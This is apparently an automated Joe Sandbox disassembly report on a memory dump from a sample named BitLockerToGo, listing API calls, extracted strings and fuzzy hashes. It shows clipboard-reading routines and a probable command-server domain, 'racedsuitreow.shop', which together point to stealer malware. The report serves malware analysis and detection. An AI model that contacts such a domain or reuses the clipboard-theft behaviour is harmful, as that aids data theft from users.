                                          • Not Executed
                                          control_flow_graph 555 2b11fa0-2b11faf 556 2b12020 555->556 557 2b11fb6-2b11fcb 555->557 556->556 558 2b11ff6-2b1200f RtlFreeHeap 557->558 559 2b11fcd-2b11fcf 557->559 558->556 560 2b11fd0-2b11ff4 call 2b15400 559->560 560->558
                                          APIs
                                          • RtlFreeHeap.NTDLL(?,00000000,?), ref: 02B12003
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: dffab1e158853bab55bf1bcf5c5ba9190559956add7c8c4a123f352b99cebd96
                                          • Instruction ID: e7700f61438dcd542b1650f854c170b18e55ba823c4a890863bc031b8be83fed
                                          • Opcode Fuzzy Hash: dffab1e158853bab55bf1bcf5c5ba9190559956add7c8c4a123f352b99cebd96
                                          • Instruction Fuzzy Hash: 73018C3490C240DBC311EF18D844A1EFBF4EF1A641F865D58E8C4E7251C331D824CBA6
                                          APIs
                                          • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 02AE1D77
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID: InitializeSecurity
                                          • String ID:
                                          • API String ID: 640775948-0
                                          • Opcode ID: a48b7d22c4e7df6cbf3b403708041950eb0b1dbbff8457222140204bc2cbaaf7
                                          • Instruction ID: 2979efe01da679db040d6f603aedca84b64f2ad274f58193b7c5f86c202cc81d
                                          • Opcode Fuzzy Hash: a48b7d22c4e7df6cbf3b403708041950eb0b1dbbff8457222140204bc2cbaaf7
                                          • Instruction Fuzzy Hash: 45D048307C8311B6F1310A08BC17F443110A702F62FB00B10B320BD0C089E03120861D
                                          APIs
                                          • CoInitialize.OLE32(00000000), ref: 02AE1D51
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID: Initialize
                                          • String ID:
                                          • API String ID: 2538663250-0
                                          • Opcode ID: e6425b681d978b2a98e7f4fe9989c758cf45fa50600b6172f022d981bea3718d
                                          • Instruction ID: 8d502ebc252b16f2f6d55748e9f6f65f810acd1212891e605e1fabb7b41ed34e
                                          • Opcode Fuzzy Hash: e6425b681d978b2a98e7f4fe9989c758cf45fa50600b6172f022d981bea3718d
                                          • Instruction Fuzzy Hash: 06C01220554605B7D34037356C1BE27355C93466A1F400734BD62829C1F9201524C1B5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID: K$!"#m$-./ $1{z}$47$4`[b$8?$9:;<$HKJM$LONA$U'p!$U+l)$`cb,$de$lonq$p;|9$twvy$UW$^VI$kji$sq$wu
                                          • API String ID: 2994545307-703385227
                                          • Opcode ID: 7d07f3ad28c6bbfe6a00d27d076680d1076779ad8f550891e71e0d15228ed5a2
                                          • Instruction ID: 46fdd0c3de4d01529ada4e292980649f4de71a48e763d937b2197b2260593df9
                                          • Opcode Fuzzy Hash: 7d07f3ad28c6bbfe6a00d27d076680d1076779ad8f550891e71e0d15228ed5a2
                                          • Instruction Fuzzy Hash: C4E278B15083809FDB20DF14C880B6FBBE1FF85318F54891DE6DA9B291EB359905CB96
                                          APIs
                                          • LoadLibraryExW.KERNEL32(?,00000000,00000800), ref: 02B01C03
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID: (}*($2FD>$7*`{$84N($:"@h$::18$=47"$AU"$GAv@$Wpy{$~PF<
                                          • API String ID: 1029625771-2248917442
                                          • Opcode ID: 40137f34d564d00e38ea22b39561b816b7959a63b6d27f0f06cd2395e32fbfcb
                                          • Instruction ID: aed22fab6d24d732a453f10a8e1b7f76ae47558227521c7e2aeb230c7f71b9e8
                                          • Opcode Fuzzy Hash: 40137f34d564d00e38ea22b39561b816b7959a63b6d27f0f06cd2395e32fbfcb
                                          • Instruction Fuzzy Hash: 42238D70504B808BD7768F39C494BA7BFE1EF16305F58899DD4EB8B282DB35A449CB50
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                          • String ID: O$P$R$U$U$W$^$_
                                          • API String ID: 2832541153-2296721427
                                          • Opcode ID: 437d1d0c30dc4f778b37e701b48971de13c5f04117b59b51fd3865539de71bc7
                                          • Instruction ID: 66ac31f1c66f688d876e93262d461a05f90a9e6ebfd7dd2c2864a531bb48ef16
                                          • Opcode Fuzzy Hash: 437d1d0c30dc4f778b37e701b48971de13c5f04117b59b51fd3865539de71bc7
                                          • Instruction Fuzzy Hash: 55416B7050C7818FD301EF38948836FFFE0AB96214F0449ADE4D986282CA79D548DB93
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4`[b$4`[b$O\$SX$Z\$_Y$lF$z1}7$}=x3$~9h?$C"E$][
                                          • API String ID: 0-280544624
                                          • Opcode ID: bb026e4abb2a3846df3e5eacca252732e9ade188d4a251bb5563a77686832125
                                          • Instruction ID: 300061130785ce51a1d37a33abfbc7e21dfa59bf3d1960be7d117ea09ae40b5f
                                          • Opcode Fuzzy Hash: bb026e4abb2a3846df3e5eacca252732e9ade188d4a251bb5563a77686832125
                                          • Instruction Fuzzy Hash: D89278B4A00A0AEFDB14CFA5D9806AEFBB1FF05340F608508E559AB751D738A961CFD1
                                          APIs
                                            • Part of subcall function 02B07400: OpenClipboard.USER32 ref: 02B07410
                                            • Part of subcall function 02B07400: GetWindowLongW.USER32 ref: 02B07435
                                            • Part of subcall function 02B07400: GetClipboardData.USER32 ref: 02B07445
                                            • Part of subcall function 02B07400: CloseClipboard.USER32 ref: 02B0755D
                                          • CoUninitialize.OLE32 ref: 02AE2856
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID: Clipboard$CloseDataLongOpenUninitializeWindow
                                          • String ID: *1Q$4`[b$8$D$Rqs$T]R#$racedsuitreow.shop$y{
                                          • API String ID: 2969723533-1374116824
                                          • Opcode ID: 6344a7dea565cddaf5e0b86a3f26d46b5b5bac28ecae748a1dee80b1c57688a7
                                          • Instruction ID: 962610dff480eb4f87718bbab596d8ef502b83d6b0ffb73d5cb84e0c1b5c525c
                                          • Opcode Fuzzy Hash: 6344a7dea565cddaf5e0b86a3f26d46b5b5bac28ecae748a1dee80b1c57688a7
                                          • Instruction Fuzzy Hash: BF3257B0449381DBEB21CF14D494BAFBBE1BF86348F44495CE8CA5B281DB76950ACF52
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4`[b$4`[b$I^$J$Ks$X$[M$\f$lC$r
                                          • API String ID: 0-1032006572
                                          • Opcode ID: 7df7fa8884400e46635303872dd7971e661a1236518cf9b8e8f993d895cf93a8
                                          • Instruction ID: a4cf56c4ca003499bc27b84028227efd5f5693146d481009ba0a46e00996ee5b
                                          • Opcode Fuzzy Hash: 7df7fa8884400e46635303872dd7971e661a1236518cf9b8e8f993d895cf93a8
                                          • Instruction Fuzzy Hash: 6A12CCB5808380DBD7309F24D880B6BB7E6FF85359F440919F69A8B261EB39D911CB52
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: -$0123456789ABCDEFXP$0123456789abcdefxp$@$A$gfff$gfff$gfff
                                          • API String ID: 0-2771814109
                                          • Opcode ID: b100568a374720a6aeb4d2b283dd3356208b9df468bf616d7c19289d628e5113
                                          • Instruction ID: f2bf5b5a731c22b85f538f1b00fc93693bb4fe8cf82aece323c065bf801ac5d3
                                          • Opcode Fuzzy Hash: b100568a374720a6aeb4d2b283dd3356208b9df468bf616d7c19289d628e5113
                                          • Instruction Fuzzy Hash: 1CD2E775A083518FD714CF28C48036AFBE2AFC5314F188A6DE89ADB391DB75D945CB82
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 0$0$0$0$d$i$u
                                          • API String ID: 0-3486945486
                                          • Opcode ID: 1de251031d2a482816023c4ca8c598314d7744be144c9700965320674aa71c46
                                          • Instruction ID: 9967444fe17d24f461c8e83bcbac5caa3daad38338f2720f2c189f849606e686
                                          • Opcode Fuzzy Hash: 1de251031d2a482816023c4ca8c598314d7744be144c9700965320674aa71c46
                                          • Instruction Fuzzy Hash: 9D72E275A083418FD318CF28C49076ABBE2EFC5744F148A6DE8DA97392DB75D905CB82
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ?Z1$-C3}$3>?<$4`[b$?W2Q4[(U'_3Y_#[]@'T!$AG<D$_#[]
                                          • API String ID: 0-4270218272
                                          • Opcode ID: 1cf1b97de3ee643f83f738ff90d4a42e04ddde05ae93e0a6827d403054441bc7
                                          • Instruction ID: aa0f640be6e3a75cb8fc20cb6aa624f5f34dae3e28cb804f6279b5254927bab6
                                          • Opcode Fuzzy Hash: 1cf1b97de3ee643f83f738ff90d4a42e04ddde05ae93e0a6827d403054441bc7
                                          • Instruction Fuzzy Hash: 295279B59087808FD730DF24D490BAFBBE6BF85308F54491DE69A8B291DB359806CF52
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 7y$B$Gx$LO$fu$iUcK268UmskJ7BooTQRCfMUbls.hg05IeE3Z8iZ6ob4-1727337613-0.0.1.1-/api$~z
                                          • API String ID: 0-2937790833
                                          • Opcode ID: fe5be4c2529d8625f4f8799d2dea9be0e9d90813e01905185156d11f839e09ca
                                          • Instruction ID: 490717f7a854d1b854e63cea2cb1d0fa0abd38b12c91a40947e4276b8eb36caf
                                          • Opcode Fuzzy Hash: fe5be4c2529d8625f4f8799d2dea9be0e9d90813e01905185156d11f839e09ca
                                          • Instruction Fuzzy Hash: C3D17AB450C3808FD311DF18C494A6FFBE1AF92648F28095CE4D68B661DB36D949CB97
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: * ,$$+3AC$7+9D$WS-#$i2]/$z{
                                          • API String ID: 0-3511077612
                                          • Opcode ID: 2675765845a7d75b55a757bae753743a06b69a8da8883b3001493a7a2a27dc83
                                          • Instruction ID: 16df220115a609079ec66a86d5f4ad4be0577cfe30c388fd66d2ed80af7a6376
                                          • Opcode Fuzzy Hash: 2675765845a7d75b55a757bae753743a06b69a8da8883b3001493a7a2a27dc83
                                          • Instruction Fuzzy Hash: 7052FB71A08341DFD314DF28D890B2ABBE6FB99344F4A8D6CF59587291DB34D868CB42
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: -$0123456789ABCDEFXP$0123456789abcdefxp$E$gfff$gfff
                                          • API String ID: 0-2211778581
                                          • Opcode ID: 3d9111e0cf604192a002be60a900679810c1065d716ee1261f33bc24e7a1d517
                                          • Instruction ID: 2c5a183a20c4800bab5262df4d355d6e77cd0960ea57955ea63a5d498582ac68
                                          • Opcode Fuzzy Hash: 3d9111e0cf604192a002be60a900679810c1065d716ee1261f33bc24e7a1d517
                                          • Instruction Fuzzy Hash: 63D1A17550C7928FC715CF29C48036AFBE2AFD5204F088A6EE8DA87356D735D909CB92
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: K$8?$U+l)$de$p;|9
                                          • API String ID: 0-2269028047
                                          • Opcode ID: d457e5e45bcfde24b162b062a1b0a3ed3899c60c48329915cfcd0c0ef77a66e6
                                          • Instruction ID: 176e9a34b94d6780069c77b8dce04ac4428b8cc9775408edfef4ab0f2a18c6da
                                          • Opcode Fuzzy Hash: d457e5e45bcfde24b162b062a1b0a3ed3899c60c48329915cfcd0c0ef77a66e6
                                          • Instruction Fuzzy Hash: A02274B45083809FCB10AF18D880A2FBBF1EF96358F448D1DE4D98B251E739C916CB96
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4`[b$4`[b$L}$Mx$\]
                                          • API String ID: 0-3088997012
                                          • Opcode ID: 8c7808b457c37db01bf3c82baccedfc241bc59fc4bbfd378dbaeaec829113510
                                          • Instruction ID: 4b7e7f940d4226a12334e825ef0eee2cff40d8c3fb9f565fa6808633d23fcdf0
                                          • Opcode Fuzzy Hash: 8c7808b457c37db01bf3c82baccedfc241bc59fc4bbfd378dbaeaec829113510
                                          • Instruction Fuzzy Hash: 3CE165B4948340DFE360EF64E880B6ABBE5FB85344F458D2CE6D887292DB359815CF52
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: a|hi$dd3~$jhJ6$tai|$t
                                          • API String ID: 0-2630083251
                                          • Opcode ID: c76c92dc6813815e80f885c319de2628f100eff9e1e8739f756bfeb419b3f333
                                          • Instruction ID: 491f3b4bfa2b832e97de30995d19403ac9016234503a6e4ff360e90b936ab6ec
                                          • Opcode Fuzzy Hash: c76c92dc6813815e80f885c319de2628f100eff9e1e8739f756bfeb419b3f333
                                          • Instruction Fuzzy Hash: 41C17BB540C7908FD3218F29C49066AFBE1AF96614F18899DE4EA5B352CB35C505CBA3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: A{y$A{y$\S$hi$sq
                                          • API String ID: 0-3616034559
                                          • Opcode ID: 2c27465a2f045c7e3ad615ca64400a165f47c1e1be51f400fa202a5436617aa1
                                          • Instruction ID: 5ae69538f024cfa2b96ee997191e3eb973f22958f8965cb4adb50e8356b580a6
                                          • Opcode Fuzzy Hash: 2c27465a2f045c7e3ad615ca64400a165f47c1e1be51f400fa202a5436617aa1
                                          • Instruction Fuzzy Hash: 88717170508380EBD7109F64D894A2FBBF1EF8A784F805C2CF88A97250DB79D865DB16
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4`[b$53
                                          • API String ID: 0-1552651976
                                          • Opcode ID: 572246cae0d3bd04eb394833dc224782e3e2a10effd22208a7dfb5f535d6207a
                                          • Instruction ID: 77b7bb00fea612afacc432a4087756ab338f847bae8382bf03f7d5dfebb2b81e
                                          • Opcode Fuzzy Hash: 572246cae0d3bd04eb394833dc224782e3e2a10effd22208a7dfb5f535d6207a
                                          • Instruction Fuzzy Hash: B76203B5904355CFDB20CFA8D8807AEB7B2FF49308F144869E69997242DB38D945CF61
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4`[b$pq$psru
                                          • API String ID: 0-1791658692
                                          • Opcode ID: 027a4c4c35c4ba0f374090df7bea1fee70e5f4f4d5f35a3d7091be5b6bcbba8b
                                          • Instruction ID: 228740e0f331f6848607a6fa4c02ec7de04e386b4256902470ac80878ab6a5c7
                                          • Opcode Fuzzy Hash: 027a4c4c35c4ba0f374090df7bea1fee70e5f4f4d5f35a3d7091be5b6bcbba8b
                                          • Instruction Fuzzy Hash: FBC1F0B19083409BD750EF94C885A2BB7F5FF86354F88481CFAC68B251EB39D915CB62
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: )$)$IEND
                                          • API String ID: 0-588110143
                                          • Opcode ID: 35ced4b9d13696d9c76850835410de425840feb854ccd0eda6ce77c381602878
                                          • Instruction ID: b6c816f7eb617412710189d7b6fcd673f1ddeb166a2221510f2721cdc40ac1fc
                                          • Opcode Fuzzy Hash: 35ced4b9d13696d9c76850835410de425840feb854ccd0eda6ce77c381602878
                                          • Instruction Fuzzy Hash: 15F1D2B5A487019FD314DF28D88572BBBE1BF84318F044A2DE99697381DB78E915CBC2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: PZ$T$XR
                                          • API String ID: 0-1000782970
                                          • Opcode ID: a28619ae2274d71fe4d10da7ab422f94f8a31f81c0a5e8ef548e3155b46a2e77
                                          • Instruction ID: fad9d94b9756933fd2af059bb6cda7fc05bbb05e613aab632e1dc63efb87d467
                                          • Opcode Fuzzy Hash: a28619ae2274d71fe4d10da7ab422f94f8a31f81c0a5e8ef548e3155b46a2e77
                                          • Instruction Fuzzy Hash: D0B11571A083808BE714DE28DC44B6FFBE6EBC5318F88496DE99597341EB31D805CB92
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID: %&' $%&' $4`[b
                                          • API String ID: 2994545307-612491952
                                          • Opcode ID: 799eb33f2c9b2c345ffa8dc919e0d6929017e624b5c386b34a917132c64ccd02
                                          • Instruction ID: bcf41ee44837cca9d0e297a590f40ad991087b8eb022dcc085147c97f252b46a
                                          • Opcode Fuzzy Hash: 799eb33f2c9b2c345ffa8dc919e0d6929017e624b5c386b34a917132c64ccd02
                                          • Instruction Fuzzy Hash: E291D371A08340ABD724CB14DC80BABBBEAEF85354F944C5CF98487391EB30E954CB92
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID: ClearVariant
                                          • String ID:
                                          • API String ID: 1473721057-0
                                          • Opcode ID: cd070147b81b36f51ea5e362888998d8936d1d87f047b9e56eb90e62480a3872
                                          • Instruction ID: 0a5af687fd2681aeae1ccde5bafbf41a458a07b37e86bd1eaac1015419c06fbb
                                          • Opcode Fuzzy Hash: cd070147b81b36f51ea5e362888998d8936d1d87f047b9e56eb90e62480a3872
                                          • Instruction Fuzzy Hash: 58D092B4940201DFC3149FA0D88C825F779FF4A3827506894F81AD7311CB35E862CF24
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Inf$NaN
                                          • API String ID: 0-3500518849
                                          • Opcode ID: 3396d8693798f6d408cb870c78aa8940b5e9a6b50c7bb5c6721fa8b5216ba6f9
                                          • Instruction ID: 2216e88809f5fdf57948536df320ff8a242f63c5e0c98eb6a5604b914da2477d
                                          • Opcode Fuzzy Hash: 3396d8693798f6d408cb870c78aa8940b5e9a6b50c7bb5c6721fa8b5216ba6f9
                                          • Instruction Fuzzy Hash: 0EE1C4B2A083019BC704CF29C98065AB7E2EBC4754F15896DF99AD7390EB75DD448F82
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: %&' $P
                                          • API String ID: 0-923373239
                                          • Opcode ID: 70ffab0f0ddcdb38ed84f33c260872fac3d14572692ed64326da1e9c08b7b808
                                          • Instruction ID: 63f0919c403b915ad0e97b8abb5243408940d6ef26202247cb8ab6fe365134ca
                                          • Opcode Fuzzy Hash: 70ffab0f0ddcdb38ed84f33c260872fac3d14572692ed64326da1e9c08b7b808
                                          • Instruction Fuzzy Hash: 8BD1F3729082618FC726CE18D89071FF6E1EB84718F968A6CE8B5AB385CB71DD05D7C1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: '$4`[b
                                          • API String ID: 0-1380400596
                                          • Opcode ID: 8fbf7163056dd71d1e16c821bb5efd9d1a2f663f89b9fd31baa53c032013a1cb
                                          • Instruction ID: f479652c373efa28298e07122896fc106a0f6de1da278d14d7fffeb5632879ea
                                          • Opcode Fuzzy Hash: 8fbf7163056dd71d1e16c821bb5efd9d1a2f663f89b9fd31baa53c032013a1cb
                                          • Instruction Fuzzy Hash: 88C1FD7150C3808FD315CF69C59072ABFE2AB8A314F198E5CF5E9872A2CB359918CF52
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4`[b$4`[b
                                          • API String ID: 0-3640500014
                                          • Opcode ID: 59412eb362f88ddbdb451010c8cc0b481116fb4fd01fe77ef1b3c2b3a9ae1102
                                          • Instruction ID: 3fb330336d46e4ac715e4c38aab593e3dd847d8e8cbf53abcfa136acfa238c27
                                          • Opcode Fuzzy Hash: 59412eb362f88ddbdb451010c8cc0b481116fb4fd01fe77ef1b3c2b3a9ae1102
                                          • Instruction Fuzzy Hash: 9A819E70E142699FDF21CF98D880BBEBB72FB49344F544CA4EA15A7281D735E914CBA0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: %&' $4`[b
                                          • API String ID: 0-3857453902
                                          • Opcode ID: 66ba92ebe8795b7fd08b41a2514534a36cd91f58e4877b6f2257d0f629fff464
                                          • Instruction ID: cad37851bb3638072c433a7b61c60d7d81b3cc73c46527f32fccfdb5cad8a910
                                          • Opcode Fuzzy Hash: 66ba92ebe8795b7fd08b41a2514534a36cd91f58e4877b6f2257d0f629fff464
                                          • Instruction Fuzzy Hash: C95117316083109BC7249A18CC90B2FBBFAEFC5754F958A6CE8D957390D731E824CB91
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 0$8
                                          • API String ID: 0-46163386
                                          • Opcode ID: 580cc2f88cc6b0cf75db6d640956bd307d1b49abfa2b1822b3bc76a2147f4e93
                                          • Instruction ID: 8b2c3b5d63ed32ec86bdf3d0ca5a31ee1db331de3a0aa26bbc1a92dad6bbfdcb
                                          • Opcode Fuzzy Hash: 580cc2f88cc6b0cf75db6d640956bd307d1b49abfa2b1822b3bc76a2147f4e93
                                          • Instruction Fuzzy Hash: 8851003561D384CFD3158F68D08478BBBE1ABEA354F888D5DE8C49B382C675C958CB92
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID: %&' $@
                                          • API String ID: 2994545307-717135571
                                          • Opcode ID: bc3bc3b181489bf30c791c75edcbb036b60cf0f8c6f87950983e82d702761f73
                                          • Instruction ID: c502565a2834120222a7990450a5d79e0fa8c960a00657466a157a1ff2f97903
                                          • Opcode Fuzzy Hash: bc3bc3b181489bf30c791c75edcbb036b60cf0f8c6f87950983e82d702761f73
                                          • Instruction Fuzzy Hash: C5318A719083449BC324DF14D891A2BFBF9FFC9318F58992DE98897290D335DA18CB96
                                          Strings
                                          Memory Dump Source
